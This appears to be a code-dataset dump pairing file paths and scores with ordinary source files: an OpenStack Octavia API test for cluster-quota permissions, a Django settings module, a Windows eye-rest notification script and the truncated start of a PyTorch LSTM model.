self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(clusterquota_path, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_delete_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(clusterquota_path, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota']) | octavia/tests/functional/api/v2/test_clusterquotas.py | import random
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from oslo_utils import uuidutils
from octavia.common import constants
import octavia.common.context
from octavia.tests.functional.api.v2 import base
CONF = cfg.CONF
class TestClusterQuotas(base.BaseAPITest):
root_tag = 'clusterquota'
def setUp(self):
super(TestClusterQuotas, self).setUp()
conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
conf.config(
group="clusterquotas",
cluster_total_loadbalancers=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_healthmonitors_per_pool=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_listeners_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
# We need to make sure unlimited gets tested each pass
conf.config(
group="clusterquotas",
max_members_per_pool=constants.QUOTA_UNLIMITED)
conf.config(
group="clusterquotas",
max_pools_per_loadbalancer=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7policies_per_listener=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
conf.config(
group="clusterquotas",
max_l7rules_per_l7policy=random.randrange(
constants.QUOTA_UNLIMITED, 9000))
def _assert_clusterquotas_equal(self, observed, expected=None):
if not expected:
expected = {'cluster_total_loadbalancers':
CONF.clusterquotas.cluster_total_loadbalancers,
'max_healthmonitors_per_pool':
CONF.clusterquotas.max_healthmonitors_per_pool,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool':
CONF.clusterquotas.max_members_per_pool,
'max_pools_per_loadbalancer':
CONF.clusterquotas.max_pools_per_loadbalancer,
'max_l7policies_per_listener':
CONF.clusterquotas.max_l7policies_per_listener,
'max_l7rules_per_l7policy':
CONF.clusterquotas.max_l7rules_per_l7policy}
self.assertEqual(expected['cluster_total_loadbalancers'],
observed['cluster_total_loadbalancers'])
self.assertEqual(expected['max_healthmonitors_per_pool'],
observed['max_healthmonitors_per_pool'])
self.assertEqual(expected['max_listeners_per_loadbalancer'],
observed['max_listeners_per_loadbalancer'])
self.assertEqual(expected['max_members_per_pool'],
observed['max_members_per_pool'])
self.assertEqual(expected['max_pools_per_loadbalancer'],
observed['max_pools_per_loadbalancer'])
self.assertEqual(expected['max_l7policies_per_listener'],
observed['max_l7policies_per_listener'])
self.assertEqual(expected['max_l7rules_per_l7policy'],
observed['max_l7rules_per_l7policy'])
def test_get(self):
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_Authorized_admin(self):
self._test_get_Authorized('load-balancer_admin')
def _test_get_Authorized(self, role):
project1_id = uuidutils.generate_uuid()
clusterquota1 = self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [role],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH
).json.get(self.root_tag)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self._assert_clusterquotas_equal(clusterquotas, clusterquota1)
def test_get_not_Authorized(self):
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
clusterquotas = self.get(self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_bogus_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer:bogus'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_not_Authorized_no_role(self):
project1_id = uuidutils.generate_uuid()
self.set_clusterquota(
cluster_total_loadbalancers=1, max_members_per_pool=1
).get(self.root_tag)
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
project1_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': [],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': project1_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
clusterquotas = self.get(
self.CLUSTERQUOTAS_PATH,
status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, clusterquotas.json)
def test_get_default_clusterquotas(self):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_get_default_clusterquotas_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_get_default_clusterquotas_not_Authorized(self):
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
uuidutils.generate_uuid()):
response = self.get(self.CLUSTERQUOTAS_DEFAULT_PATH,
status=403)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
def test_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_admin(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.put(clusterquota_path, body, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
def test_custom_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
response = self.put(clusterquota_path, body, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
self.assertEqual(self.NOT_AUTHORIZED_BODY, response.json)
def test_custom_partial_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': None,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_custom_missing_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
expected_body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer':
CONF.clusterquotas.max_listeners_per_loadbalancer,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=expected_body['clusterquota']
)
def test_delete_custom_clusterquotas(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.delete(clusterquota_path, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_delete_custom_clusterquotas_admin(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_admin'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(clusterquota_path, status=202)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'])
def test_delete_clusterquotas_not_Authorized_member(self):
clusterquota_path = self.CLUSTERQUOTAS_PATH
body = {'clusterquota': {
'cluster_total_loadbalancers': 30,
'max_healthmonitors_per_pool': 30,
'max_listeners_per_loadbalancer': 30,
'max_members_per_pool': 30,
'max_pools_per_loadbalancer': 30,
'max_l7policies_per_listener': 30,
'max_l7rules_per_l7policy': 30}}
self.put(clusterquota_path, body, status=202)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota'])
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
auth_strategy = self.conf.conf.api_settings.get('auth_strategy')
self.conf.config(group='api_settings', auth_strategy=constants.TESTING)
with mock.patch.object(octavia.common.context.Context, 'project_id',
self.project_id):
override_credentials = {
'service_user_id': None,
'user_domain_id': None,
'is_admin_project': True,
'service_project_domain_id': None,
'service_project_id': None,
'roles': ['load-balancer_member'],
'user_id': None,
'is_admin': False,
'service_user_domain_id': None,
'project_domain_id': None,
'service_roles': [],
'project_id': self.project_id}
with mock.patch(
"oslo_context.context.RequestContext.to_policy_values",
return_value=override_credentials):
self.delete(clusterquota_path, status=403)
self.conf.config(group='api_settings', auth_strategy=auth_strategy)
response = self.get(clusterquota_path)
clusterquota_dict = response.json
self._assert_clusterquotas_equal(clusterquota_dict['clusterquota'],
expected=body['clusterquota']) | 0.378689 | 0.189634 |
import os
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'authentication',
'main',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/djsta/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
STATICFILES_DIRS = [os.path.join(
BASE_DIR, "front_build")]
# Tell Django about the custom `User` model we created. The string
# `authentication.User` tells Django we are referring to the `User` model in
# the `authentication` module. This module is registered above in a setting
# called `INSTALLED_APPS`.
AUTH_USER_MODEL = 'authentication.User'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_simplejwt.authentication.JWTAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=30),
'REFRESH_TOKEN_LIFETIME': timedelta(hours=4),
'AUTH_HEADER_TYPES': ('Bearer',),
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
'TOKEN_TYPE_CLAIM': 'token_type',
} | backend/core/settings/base.py | import os
from datetime import timedelta
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), "../../"))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'authentication',
'main',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/djsta/'
STATIC_ROOT = os.path.join(BASE_DIR, "static")
STATICFILES_DIRS = [os.path.join(
BASE_DIR, "front_build")]
# Tell Django about the custom `User` model we created. The string
# `authentication.User` tells Django we are referring to the `User` model in
# the `authentication` module. This module is registered above in a setting
# called `INSTALLED_APPS`.
AUTH_USER_MODEL = 'authentication.User'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework_simplejwt.authentication.JWTAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
),
}
SIMPLE_JWT = {
'ACCESS_TOKEN_LIFETIME': timedelta(minutes=30),
'REFRESH_TOKEN_LIFETIME': timedelta(hours=4),
'AUTH_HEADER_TYPES': ('Bearer',),
'USER_ID_FIELD': 'id',
'USER_ID_CLAIM': 'user_id',
'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),
'TOKEN_TYPE_CLAIM': 'token_type',
} | 0.446495 | 0.098773 |
from win32api import *
from win32gui import *
import win32con
import sys, os
import time
from random import randint
class WindowsBalloonTip:
def __init__(self, title, msg):
message_map = {
win32con.WM_DESTROY: self.OnDestroy,
}
# Register the Window class.
wc = WNDCLASS()
hinst = wc.hInstance = GetModuleHandle(None)
wc.lpszClassName = "PythonTaskbar"
# Could also specify a wndproc.
wc.lpfnWndProc = message_map
class_atom = RegisterClass(wc)
# Create the Window.
style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
self.hwnd = CreateWindow(
class_atom,
"Taskbar",
style,
0, 0,
win32con.CW_USEDEFAULT,
win32con.CW_USEDEFAULT,
0, 0,
hinst,
None
)
UpdateWindow(self.hwnd)
icon_path_name = os.path.abspath(os.path.join( sys.path[0], "Googleeyes.ico" ))
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
try:
hicon = LoadImage( hinst, icon_path_name, win32con.IMAGE_ICON, 0, 0, icon_flags )
except Exception as e:
hicon = LoadIcon( 0, win32con.IDI_APPLICATION )
flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
nid = (self.hwnd, 0, flags, win32con.WM_USER+20, hicon, "tooltip")
Shell_NotifyIcon(NIM_ADD, nid)
Shell_NotifyIcon(NIM_MODIFY, (
self.hwnd,
0,
NIF_INFO,
win32con.WM_USER + 20,
hicon,
"Balloon tooltip",
msg,
200,
title,
NIIF_NOSOUND
)
)
# self.show_balloon(title, msg)
time.sleep(5)
DestroyWindow(self.hwnd)
def OnDestroy(self, hwnd, msg, wparam, lparam):
nid = (self.hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, nid)
# Terminate the app.
PostQuitMessage(0)
def balloon_tip(title, msg):
WindowsBalloonTip(title, msg)
if __name__ == '__main__':
messages = [
"The time has come when I will have to ask you to move your eyes as constantly staring at your screen would harm them!",
"It's been 15 minutes!! How could you still be looking at your screen!!",
"See, Let me shout you this again. MOVE YOUR EYES! STOP STARING AT YOUR SCREEN.",
"This is the time when you should give your eyes some rest."
]
balloon_tip( "Hey! You studious nerd!", messages[randint(0,len(messages)-1)]) | Notification.py | from win32api import *
from win32gui import *
import win32con
import sys, os
import time
from random import randint
class WindowsBalloonTip:
def __init__(self, title, msg):
message_map = {
win32con.WM_DESTROY: self.OnDestroy,
}
# Register the Window class.
wc = WNDCLASS()
hinst = wc.hInstance = GetModuleHandle(None)
wc.lpszClassName = "PythonTaskbar"
# Could also specify a wndproc.
wc.lpfnWndProc = message_map
class_atom = RegisterClass(wc)
# Create the Window.
style = win32con.WS_OVERLAPPED | win32con.WS_SYSMENU
self.hwnd = CreateWindow(
class_atom,
"Taskbar",
style,
0, 0,
win32con.CW_USEDEFAULT,
win32con.CW_USEDEFAULT,
0, 0,
hinst,
None
)
UpdateWindow(self.hwnd)
icon_path_name = os.path.abspath(os.path.join( sys.path[0], "Googleeyes.ico" ))
icon_flags = win32con.LR_LOADFROMFILE | win32con.LR_DEFAULTSIZE
try:
hicon = LoadImage( hinst, icon_path_name, win32con.IMAGE_ICON, 0, 0, icon_flags )
except Exception as e:
hicon = LoadIcon( 0, win32con.IDI_APPLICATION )
flags = NIF_ICON | NIF_MESSAGE | NIF_TIP
nid = (self.hwnd, 0, flags, win32con.WM_USER+20, hicon, "tooltip")
Shell_NotifyIcon(NIM_ADD, nid)
Shell_NotifyIcon(NIM_MODIFY, (
self.hwnd,
0,
NIF_INFO,
win32con.WM_USER + 20,
hicon,
"Balloon tooltip",
msg,
200,
title,
NIIF_NOSOUND
)
)
# self.show_balloon(title, msg)
time.sleep(5)
DestroyWindow(self.hwnd)
def OnDestroy(self, hwnd, msg, wparam, lparam):
nid = (self.hwnd, 0)
Shell_NotifyIcon(NIM_DELETE, nid)
# Terminate the app.
PostQuitMessage(0)
def balloon_tip(title, msg):
WindowsBalloonTip(title, msg)
if __name__ == '__main__':
messages = [
"The time has come when I will have to ask you to move your eyes as constantly staring at your screen would harm them!",
"It's been 15 minutes!! How could you still be looking at your screen!!",
"See, Let me shout you this again. MOVE YOUR EYES! STOP STARING AT YOUR SCREEN.",
"This is the time when you should give your eyes some rest."
]
balloon_tip( "Hey! You studious nerd!", messages[randint(0,len(messages)-1)]) | 0.210442 | 0.063599 |
import random
import pandas as pd
import numpy as np
from tqdm import tqdm
import datetime as dt
from itertools import combinations
import matplotlib.pyplot as plt
import collections
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
from sklearn.metrics import average_precision_score, f1_score, roc_auc_score
from gensim.models import Word2Vec
from src.utils import PickleUtils
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import BatchSampler, RandomSampler, SequentialSampler
dev = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class VanillaLSTM(nn.Module):
def __init__(self, vocab, lstm_layers, lstm_units, embed_dim, drop_rate):
super(VanillaLSTM, self).__init__()
# initializatioin
self.vocab = vocab
self.lstm_layers = lstm_layers
self.lstm_units = lstm_units
self.embed_dim = embed_dim
self.drop_rate = drop_rate
# embedding layer
vocab_size = len(self.vocab)
padding_idx = self.vocab['<PAD>']
self.embedding = nn.Embedding(
num_embeddings=vocab_size,
embedding_dim=self.embed_dim,
padding_idx=padding_idx
)
# LSTM
self.lstm = nn.LSTM(
input_size=self.embed_dim,
hidden_size=self.lstm_units,
num_layers=self.lstm_layers,
batch_first=True,
dropout=self.drop_rate
)
self.fc = nn.Sequential(
